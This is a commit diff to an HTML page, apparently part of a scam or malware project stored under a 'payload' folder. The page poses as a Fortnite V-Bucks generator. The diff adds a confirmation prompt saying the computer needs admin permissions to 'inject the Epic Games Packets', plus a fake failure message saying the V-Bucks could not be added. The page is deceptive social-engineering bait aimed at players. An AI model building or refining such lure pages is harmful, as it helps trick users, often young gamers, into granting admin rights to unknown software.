Not making a fail window, adding to index.html

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -105,7 +105,7 @@
                                         <p class="progress-title" style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Initializing Socket</p>
                                         <p id="fortnite-progress-text">Generator will modify your account</p>
                                         <div class="progress">
-                                            <div class="progress-bar   active g-progressbar" role="progressbar" style="width: 20%"></div>
+                                            <div class="progress-bar active g-progressbar" role="progressbar" style="width: 20%"></div>
                                         </div>
                                         <p class="progress-description"></p>
                                     </div>
@@ -130,6 +130,25 @@
 
                                     <div class="verification col-sm-7 col-xs-9 center-block" style="display: none;" id="confirm">
                                         <h4 style="font-family: fortnite; font-size: 20px; text-transform: uppercase;">Your computer might need admin permissions to inject the Epic Games Packets successfully. Do you want to continue?</h4>
+                                        <div id="menu-outer">
+                                            <div class="table">
+                                                <ul id="horizontal-list">                                
+                                                    <li><a href="index.html#" id="confirm_yes"><span>Yes</span></a></li>
+                                                    &nbsp;&nbsp;&nbsp; <!-- I'm a lazy ree -->
+                                                    <li><a href="index.html#" id="confirm_no"><span>No</span></a></li>
+                                                </ul>
+                                            </div>
+                                        </div>
+                                    </div>
+
+                                    <div class="verification col-sm-7 col-xs-9 center-block" style="display: none;" id="fail">
+                                        <h4 style="font-family: fortnite; font-size: 20px; text-transform: uppercase;">
+                                            <span id="user-text2"></span>,
+                                        </h4>
+                                        <p style="font-family: fortnite; font-size: 25px; margin-bottom: 12px">
+                                            It looks like we couldn't add the requested amount of V-Bucks to your account.
+                                            <span id="hint"></span> 
+                                        </p>
                                         <div id="menu-outer">
                                             <div class="table">
                                                 <ul id="horizontal-list">                                
